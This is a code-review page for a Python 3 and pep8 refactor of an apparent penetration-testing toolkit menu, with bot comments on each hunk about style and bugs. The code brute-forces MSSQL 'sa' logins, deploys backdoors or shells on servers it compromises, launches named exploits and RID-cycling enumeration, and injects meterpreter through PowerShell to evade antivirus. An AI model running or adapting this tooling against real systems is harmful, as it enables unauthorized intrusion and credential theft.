pep8 and python3 refactoring
This commit is contained in:
parent
262fe6ffed
commit
723613f3ea
5 changed files with 457 additions and 344 deletions
@ -31,51 +31,65 @@ try:
|
||||||
# start the menu
|
# start the menu
|
||||||
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
|
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
|
||||||
# take input here
|
# take input here
|
||||||
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
|
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# option 1 scan and attack, option 2 connect directly to mssql
|
# option 1 scan and attack, option 2 connect directly to mssql
|
||||||
# if 1, start scan and attack
|
# if 1, start scan and attack
|
||||||
#
|
#
|
||||||
if attack_vector_sql == '1':
|
if attack_vector_sql == '1':
|
||||||
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
|
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
|
||||||
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
choice = raw_input(
|
||||||
if choice != "1":
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
if choice != "2":
|
if choice != "1":
|
||||||
if choice !="":
|
if choice != "2":
|
||||||
print_error("You did not specify 1 or 2! Please try again.")
|
if choice != "":
|
||||||
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
print_error(
|
||||||
|
"You did not specify 1 or 2! Please try again.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
# grab ip address
|
# grab ip address
|
||||||
if choice == "": choice = "1"
|
if choice == "":
|
||||||
|
choice = "1"
|
||||||
if choice == "1":
|
if choice == "1":
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
while 1:
|
while 1:
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
print_error("File not found! Please type in the path to the file correctly.")
|
print_error(
|
||||||
|
"File not found! Please type in the path to the file correctly.")
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
if choice == "1": port = "1433"
|
if choice == "1":
|
||||||
if choice == "2": port = "1433"
|
port = "1433"
|
||||||
|
if choice == "2":
|
||||||
|
port = "1433"
|
||||||
# ask for a wordlist
|
# ask for a wordlist
|
||||||
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
|
wordlist = raw_input(setprompt(
|
||||||
if wordlist == "": wordlist = "default"
|
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
|
||||||
|
if wordlist == "":
|
||||||
|
wordlist = "default"
|
||||||
# specify the user to brute force
|
# specify the user to brute force
|
||||||
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
username = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if username == "": username = "sa"
|
if username == "":
|
||||||
|
username = "sa"
|
||||||
if username != "sa":
|
if username != "sa":
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
print_status("If you were using a file, its not found, using text as username.")
|
print_status(
|
||||||
|
"If you were using a file, its not found, using text as username.")
|
||||||
# import the mssql module from fasttrack
|
# import the mssql module from fasttrack
|
||||||
from src.fasttrack import mssql
|
from src.fasttrack import mssql
|
||||||
# choice from earlier if we want to use a filelist or whatnot
|
# choice from earlier if we want to use a filelist or whatnot
|
||||||
if choice != "2":
|
if choice != "2":
|
||||||
# sql_servers
|
# sql_servers
|
||||||
sql_servers = ''
|
sql_servers = ''
|
||||||
print_status("Hunting for SQL servers.. This may take a little bit.")
|
print_status(
|
||||||
|
"Hunting for SQL servers.. This may take a little bit.")
|
||||||
if "/" in str(range):
|
if "/" in str(range):
|
||||||
iprange = printCIDR(range)
|
iprange = printCIDR(range)
|
||||||
iprange = iprange.split(",")
|
iprange = iprange.split(",")
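Review bot: The menu validation near the top of the hunk re-prompts only once: after the first bad answer the re-read `choice` is never checked again, so a second invalid entry falls through the `if choice == "1"` / `if choice == "2"` branches and neither the `range` input nor `port` is assigned, while the later `str(range)` test and the `mssql.brute(..., port, ...)` call in the `@ -122` hunk still use them. A loop keeps the same prompt and message: `while choice not in ("", "1", "2"):` / `    print_error("You did not specify 1 or 2! Please try again.")` / `    choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))`. The `raw_input` calls throughout the hunk are also still the Python 2 builtin; unless a compatibility alias is defined elsewhere in the file, the "python3 refactoring" in the title is not complete here. The enclosing `try:` named in the hunk header starts outside the hunk.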
|
||||||
|
@ -84,7 +98,8 @@ try:
|
||||||
if sqlport != None:
|
if sqlport != None:
|
||||||
sql_servers = sql_servers + host + ":" + sqlport + ","
|
sql_servers = sql_servers + host + ":" + sqlport + ","
|
||||||
else:
|
else:
|
||||||
# use udp discovery to get the SQL server IDP through 1434
|
# use udp discovery to get the SQL server IDP through
|
||||||
|
# 1434
|
||||||
sqlport = get_sql_port(range)
|
sqlport = get_sql_port(range)
|
||||||
# UDP could be closed - defaulting to 1433
|
# UDP could be closed - defaulting to 1433
|
||||||
if sqlport != None:
|
if sqlport != None:
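Review bot: `if sqlport != None:` (twice in this hunk) compares against the `None` singleton with `!=`; the PEP 8 form is `if sqlport is not None:`. The same pattern recurs as `if sql_success != False:` in the `@ -122` and `@ -136` hunks, where `is not False` keeps the exact semantics — a plain truthiness test would also reject an empty string, which may or may not be intended. Since the commit is a pep8 pass, these are worth folding in.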
|
||||||
|
@ -94,16 +109,19 @@ try:
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
while 1:
|
while 1:
|
||||||
print_warning("Sorry boss. The file was not found. Try again")
|
print_warning(
|
||||||
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
"Sorry boss. The file was not found. Try again")
|
||||||
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
||||||
if os.path.isfile(range):
|
if os.path.isfile(range):
|
||||||
print_status("Atta boy. Found the file this time. Moving on.")
|
print_status(
|
||||||
|
"Atta boy. Found the file this time. Moving on.")
|
||||||
break
|
break
|
||||||
|
|
||||||
fileopen = file(range, "r").readlines()
|
fileopen = file(range, "r").readlines()
|
||||||
sql_servers = ""
|
sql_servers = ""
|
||||||
for line in fileopen:
|
for line in fileopen:
|
||||||
line=line.rstrip()
|
line = line.rstrip()
|
||||||
sql_servers = sql_servers + line + ","
|
sql_servers = sql_servers + line + ","
|
||||||
|
|
||||||
# this will hold all of the SQL servers eventually
|
# this will hold all of the SQL servers eventually
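Review bot: `fileopen = file(range, "r").readlines()` calls the `file` builtin, which does not exist in Python 3, so this branch raises NameError under the interpreter the commit title targets; the same call appears as `filewrite = file(setdir + "/fasttrack.options", "w")` in the `@ -179` hunk. The handle here is also never closed. `with open(range, "r") as handle:` / `    fileopen = handle.readlines()` fixes both points, and the later write becomes `with open(setdir + "/fasttrack.options", "w") as filewrite: filewrite.write("none")`. The enclosing `try:` starts outside the hunk.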
|
||||||
|
@ -122,13 +140,17 @@ try:
|
||||||
# start loop and brute force
|
# start loop and brute force
|
||||||
for servers in sql_servers:
|
for servers in sql_servers:
|
||||||
|
|
||||||
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
|
# this will return the following format ipaddr + "," +
|
||||||
|
# username + "," + str(port) + "," + passwords
|
||||||
if servers != "":
|
if servers != "":
|
||||||
# if we aren't using a username file
|
# if we aren't using a username file
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
sql_success = mssql.brute(servers, username, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
|
servers, username, port, wordlist)
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
# after each success or fail it will break into this to the above with a newline to be parsed later
|
# after each success or fail it will break
|
||||||
|
# into this to the above with a newline to
|
||||||
|
# be parsed later
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
|
@ -136,16 +158,20 @@ try:
|
||||||
if os.path.isfile(username):
|
if os.path.isfile(username):
|
||||||
for users in usernames:
|
for users in usernames:
|
||||||
users = users.rstrip()
|
users = users.rstrip()
|
||||||
sql_success = mssql.brute(servers, users, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
# we wont break out of the loop here incase theres multiple usernames we want to find
|
servers, users, port, wordlist)
|
||||||
|
# we wont break out of the loop here incase
|
||||||
|
# theres multiple usernames we want to find
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
# if we didn't successful attack one
|
# if we didn't successful attack one
|
||||||
if counter == 0:
|
if counter == 0:
|
||||||
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
print_warning(
|
||||||
pause = raw_input("Press {return} to continue to the main menu.")
|
"Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
||||||
|
pause = raw_input(
|
||||||
|
"Press {return} to continue to the main menu.")
|
||||||
# if we successfully attacked one
|
# if we successfully attacked one
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
# need to loop to keep menu going
|
# need to loop to keep menu going
|
||||||
|
@ -154,23 +180,29 @@ try:
|
||||||
counter = 1
|
counter = 1
|
||||||
# here we list the servers we compromised
|
# here we list the servers we compromised
|
||||||
master_names = master_list.split(":")
|
master_names = master_list.split(":")
|
||||||
print_status("Select the compromise SQL server you want to interact with:\n")
|
print_status(
|
||||||
|
"Select the compromise SQL server you want to interact with:\n")
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
success = success.rstrip()
|
success = success.rstrip()
|
||||||
success=success.split(",")
|
success = success.split(",")
|
||||||
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
|
||||||
print " " + str(counter) + ". " + success
|
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
||||||
|
print(" " + str(counter) + ". " + success)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
|
||||||
|
|
||||||
print "\n 99. Return back to the main menu.\n"
|
print("\n 99. Return back to the main menu.\n")
|
||||||
# select the server to interact with
|
# select the server to interact with
|
||||||
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
|
select_server = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
|
||||||
# default 1
|
# default 1
|
||||||
if select_server == "quit" or select_server == "exit": break
|
if select_server == "quit" or select_server == "exit":
|
||||||
if select_server == "": select_server = "1"
|
break
|
||||||
if select_server == "99": break
|
if select_server == "":
|
||||||
|
select_server = "1"
|
||||||
|
if select_server == "99":
|
||||||
|
break
|
||||||
counter = 1
|
counter = 1
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
|
@ -179,22 +211,30 @@ try:
|
||||||
# if we equal the number used above
|
# if we equal the number used above
|
||||||
if counter == int(select_server):
|
if counter == int(select_server):
|
||||||
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
||||||
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
|
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
|
||||||
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
|
option = raw_input(
|
||||||
if option == "": option = "1"
|
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
|
||||||
|
if option == "":
|
||||||
|
option = "1"
|
||||||
# if 99 then break
|
# if 99 then break
|
||||||
if option == "99": break
|
if option == "99":
|
||||||
# specify we are using the fasttrack option, this disables some features
|
break
|
||||||
filewrite = file(setdir + "/fasttrack.options", "w")
|
# specify we are using the fasttrack
|
||||||
|
# option, this disables some features
|
||||||
|
filewrite = file(
|
||||||
|
setdir + "/fasttrack.options", "w")
|
||||||
filewrite.write("none")
|
filewrite.write("none")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
# import fasttrack
|
# import fasttrack
|
||||||
if option == "1":
|
if option == "1":
|
||||||
# import payloads for selection and prep
|
# import payloads for selection and
|
||||||
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3])
|
# prep
|
||||||
|
mssql.deploy_hex2binary(
|
||||||
|
success[0], success[2], success[1], success[3])
|
||||||
# straight up connect
|
# straight up connect
|
||||||
if option == "2":
|
if option == "2":
|
||||||
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
|
mssql.cmdshell(success[0], success[2], success[
|
||||||
|
1], success[3], option)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
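Review bot: `if counter == int(select_server):` converts operator input that the previous hunk only checks against `""`, `"quit"`, `"exit"` and `"99"`; any other non-numeric entry raises ValueError here, and the only handler visible on the page is the file-level `except KeyboardInterrupt`, so the tool would presumably exit instead of re-prompting. A guard after the default is applied, `if not select_server.isdigit(): print_error("Please enter a number from the list."); continue`, keeps the menu going, assuming the `while` that the "need to loop to keep menu going" comment refers to encloses this code (it starts outside the hunk). The `filewrite = file(...)` call in this hunk shares the Python 3 `file` builtin problem raised on the `@ -94` hunk.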
|
||||||
|
|
||||||
|
@ -202,51 +242,59 @@ try:
|
||||||
# if we want to connect directly to a SQL server
|
# if we want to connect directly to a SQL server
|
||||||
#
|
#
|
||||||
if attack_vector_sql == "2":
|
if attack_vector_sql == "2":
|
||||||
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
|
sql_server = raw_input(setprompt(
|
||||||
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
|
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
|
||||||
if sql_port == "": sql_port = "1433"
|
sql_port = raw_input(
|
||||||
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
|
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
|
||||||
|
if sql_port == "":
|
||||||
|
sql_port = "1433"
|
||||||
|
sql_username = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if sql_username == "": sql_username = "sa"
|
if sql_username == "":
|
||||||
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
|
sql_username = "sa"
|
||||||
|
sql_password = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
|
||||||
print_status("Connecting to the SQL server...")
|
print_status("Connecting to the SQL server...")
|
||||||
# try connecting
|
# try connecting
|
||||||
# establish base counter for connection
|
# establish base counter for connection
|
||||||
counter = 0
|
counter = 0
|
||||||
try:
|
try:
|
||||||
import _mssql
|
import _mssql
|
||||||
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
|
conn = _mssql.connect(
|
||||||
|
sql_server + ":" + str(sql_port), sql_username, sql_password)
|
||||||
counter = 1
|
counter = 1
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print e
|
print(e)
|
||||||
print_error("Connection to SQL Server failed. Try again.")
|
print_error("Connection to SQL Server failed. Try again.")
|
||||||
# if we had a successful connection
|
# if we had a successful connection
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
print_status("Dropping into a SQL shell. Type quit to exit.")
|
print_status(
|
||||||
|
"Dropping into a SQL shell. Type quit to exit.")
|
||||||
# loop forever
|
# loop forever
|
||||||
while 1:
|
while 1:
|
||||||
# enter the sql command
|
# enter the sql command
|
||||||
sql_shell = raw_input("Enter your SQL command here: ")
|
sql_shell = raw_input("Enter your SQL command here: ")
|
||||||
if sql_shell == "quit" or sql_shell == "exit":
|
if sql_shell == "quit" or sql_shell == "exit":
|
||||||
print_status("Exiting the SQL shell and returning to menu.")
|
print_status(
|
||||||
|
"Exiting the SQL shell and returning to menu.")
|
||||||
break
|
break
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# execute the query
|
# execute the query
|
||||||
sql_query = conn.execute_query(sql_shell)
|
sql_query = conn.execute_query(sql_shell)
|
||||||
# return results
|
# return results
|
||||||
print "\n"
|
print("\n")
|
||||||
for data in conn:
|
for data in conn:
|
||||||
data = str(data)
|
data = str(data)
|
||||||
data = data.replace("\\n\\t", "\n")
|
data = data.replace("\\n\\t", "\n")
|
||||||
data = data.replace("\\n", "\n")
|
data = data.replace("\\n", "\n")
|
||||||
data = data.replace("{0: '", "")
|
data = data.replace("{0: '", "")
|
||||||
data = data.replace("'}", "")
|
data = data.replace("'}", "")
|
||||||
print data
|
print(data)
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
print_warning(
|
||||||
|
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
||||||
|
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
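Review bot: `import _mssql` sits inside the same `try` as `_mssql.connect(...)`, so a missing driver is caught by `except Exception as e` and reported as "Connection to SQL Server failed. Try again.", which sends the operator chasing the wrong problem. A dedicated clause before the generic one, `except ImportError:` / `    print_error("The _mssql module is not installed.")`, keeps the connection error message accurate. `print(e)` is fine for a CLI tool, but `print_error(str(e))` would match the surrounding output style. The outer `try:` starts outside the hunk.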
|
||||||
|
@ -255,36 +303,50 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "2":
|
if attack_vector == "2":
|
||||||
# start the menu
|
# start the menu
|
||||||
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
|
create_menu(text.fasttrack_exploits_text1,
|
||||||
|
text.fasttrack_exploits_menu1)
|
||||||
# enter the exploits menu here
|
# enter the exploits menu here
|
||||||
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
|
range = raw_input(
|
||||||
|
setprompt(["19", "24"], "Select the number of the exploit you want"))
|
||||||
|
|
||||||
# ms08067
|
# ms08067
|
||||||
if range == "1":
|
if range == "1":
|
||||||
try: reload(src.fasttrack.exploits.ms08067)
|
try:
|
||||||
except: import src.fasttrack.exploits.ms08067
|
reload(src.fasttrack.exploits.ms08067)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.ms08067
|
||||||
|
|
||||||
# firefox 3.6.16
|
# firefox 3.6.16
|
||||||
if range == "2":
|
if range == "2":
|
||||||
try: reload(src.fasttrack.exploits.firefox_3_6_16)
|
try:
|
||||||
except: import src.fasttrack.exploits.firefox_3_6_16
|
reload(src.fasttrack.exploits.firefox_3_6_16)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.firefox_3_6_16
|
||||||
# solarwinds
|
# solarwinds
|
||||||
if range == "3":
|
if range == "3":
|
||||||
try: reload(src.fasttrack.exploits.solarwinds)
|
try:
|
||||||
except: import src.fasttrack.exploits.solarwinds
|
reload(src.fasttrack.exploits.solarwinds)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.solarwinds
|
||||||
|
|
||||||
# rdp DoS
|
# rdp DoS
|
||||||
if range == "4":
|
if range == "4":
|
||||||
try: reload(src.fasttrack.exploits.rdpdos)
|
try:
|
||||||
except: import src.fasttrack.exploits.rdpdos
|
reload(src.fasttrack.exploits.rdpdos)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.rdpdos
|
||||||
|
|
||||||
if range == "5":
|
if range == "5":
|
||||||
try: reload(src.fasttrack.exploits.mysql_bypass)
|
try:
|
||||||
except: import src.fasttrack.exploits.mysql_bypass
|
reload(src.fasttrack.exploits.mysql_bypass)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.mysql_bypass
|
||||||
|
|
||||||
if range == "6":
|
if range == "6":
|
||||||
try: reload(src.fasttrack.exploits.f5)
|
try:
|
||||||
except: import src.fasttrack.exploits.f5
|
reload(src.fasttrack.exploits.f5)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.f5
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
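Review bot: `reload(src.fasttrack.exploits.ms08067)` (and the five sibling blocks below it) calls `reload` as a builtin, which Python 3 only provides as `importlib.reload`, so on the target interpreter every branch takes the bare `except:` path and silently falls back to `import`; the same pattern appears in the `@ -293` (sccm) and `@ -368` (psexec) hunks. The bare `except:` also swallows any exception the exploit module itself raises while reloading, including KeyboardInterrupt, which the file-level handler is meant to receive. Narrowing it to `except (NameError, AttributeError):` — presumably the first-use case the fallback was written for — and adding `from importlib import reload` at the top of the file (outside this page) would make the intent explicit. The enclosing `try:` starts outside the hunk.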
|
||||||
|
@ -293,9 +355,10 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "3":
|
if attack_vector == "3":
|
||||||
# load sccm attack
|
# load sccm attack
|
||||||
try: reload(src.fasttrack.sccm.sccm_main)
|
try:
|
||||||
except: import src.fasttrack.sccm.sccm_main
|
reload(src.fasttrack.sccm.sccm_main)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.sccm.sccm_main
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -304,8 +367,8 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "4":
|
if attack_vector == "4":
|
||||||
# load drac menu
|
# load drac menu
|
||||||
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
|
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
|
||||||
|
(definepath), shell=True).wait()
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
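Review bot: `subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()` still builds a shell command line by string interpolation; the `@ -343` hunk does the same with `rid_enum.py` and the operator-entered `ipaddr`, `start_rid`, `stop_rid` and `dict` values, where a space or shell metacharacter in any of them breaks the command or is interpreted by the shell rather than passed to the script. Passing an argument list without a shell removes the quoting problem: `subprocess.Popen(["python", definepath + "/src/fasttrack/delldrac.py"]).wait()` here and `subprocess.Popen(["python", "src/fasttrack/rid_enum.py", ipaddr, start_rid, stop_rid, dict]).wait()` there. Checking that `start_rid` and `stop_rid` are numeric before the call would also give a clearer error than whatever the child script reports. The enclosing `try:` starts outside the hunk.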
|
||||||
|
@ -321,13 +384,16 @@ try:
|
||||||
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
||||||
|______|
|
|______|
|
||||||
""")
|
""")
|
||||||
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
|
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
|
||||||
print "\n"
|
print("\n")
|
||||||
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
ipaddr = raw_input(
|
||||||
|
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
||||||
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
||||||
break
|
break
|
||||||
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
print_status(
|
||||||
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
||||||
|
dict = raw_input(setprompt(
|
||||||
|
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
||||||
# if we are using the built in one
|
# if we are using the built in one
|
||||||
if dict == "":
|
if dict == "":
|
||||||
# write out a file
|
# write out a file
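Review bot: `dict = raw_input(setprompt(["31"], ...))` rebinds the builtin `dict` name for the rest of the block, which flake8-builtins flags and which the `@ -343` hunk then passes into the `rid_enum.py` command line. A descriptive name such as `dict_path` (applied to the `if dict == ""` / `dict = ""` lines here and the uses in the next hunk) is a small, safe change for a pep8-titled commit. The `range` variable used for the CIDR/file input and the exploit menu selection earlier in the file has the same issue. The enclosing `try:` starts outside the hunk.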
|
||||||
|
@ -343,20 +409,29 @@ try:
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
if dict != "":
|
if dict != "":
|
||||||
print_warning("You are about to brute force user accounts, be careful for lockouts.")
|
print_warning(
|
||||||
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
"You are about to brute force user accounts, be careful for lockouts.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
||||||
if choice.lower() == "n" or choice.lower() == "no":
|
if choice.lower() == "n" or choice.lower() == "no":
|
||||||
print_status("Okay. Not brute forcing user accounts *phew*.")
|
print_status(
|
||||||
|
"Okay. Not brute forcing user accounts *phew*.")
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
# next we see what rid we want to start
|
# next we see what rid we want to start
|
||||||
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
|
start_rid = raw_input(
|
||||||
if start_rid == "": start_rid = "500"
|
setprompt(["31"], "What RID do you want to start at [500]"))
|
||||||
|
if start_rid == "":
|
||||||
|
start_rid = "500"
|
||||||
# stop rid
|
# stop rid
|
||||||
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
|
stop_rid = raw_input(
|
||||||
if stop_rid == "": stop_rid = "15000"
|
setprompt(["31"], "What RID do you want to stop at [15000]"))
|
||||||
print_status("Launching RID_ENUM to start enumerating user accounts...")
|
if stop_rid == "":
|
||||||
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
|
stop_rid = "15000"
|
||||||
|
print_status(
|
||||||
|
"Launching RID_ENUM to start enumerating user accounts...")
|
||||||
|
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
|
||||||
|
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
|
||||||
|
|
||||||
# once we are finished, prompt.
|
# once we are finished, prompt.
|
||||||
print_status("Everything is finished!")
|
print_status("Everything is finished!")
|
||||||
|
@ -368,9 +443,11 @@ try:
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "6":
|
if attack_vector == "6":
|
||||||
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n"
|
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
|
||||||
try: reload(src.fasttrack.psexec)
|
try:
|
||||||
except: import src.fasttrack.psexec
|
reload(src.fasttrack.psexec)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.psexec
|
||||||
|
|
||||||
# handle keyboard exceptions
|
# handle keyboard exceptions
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
|
|
|
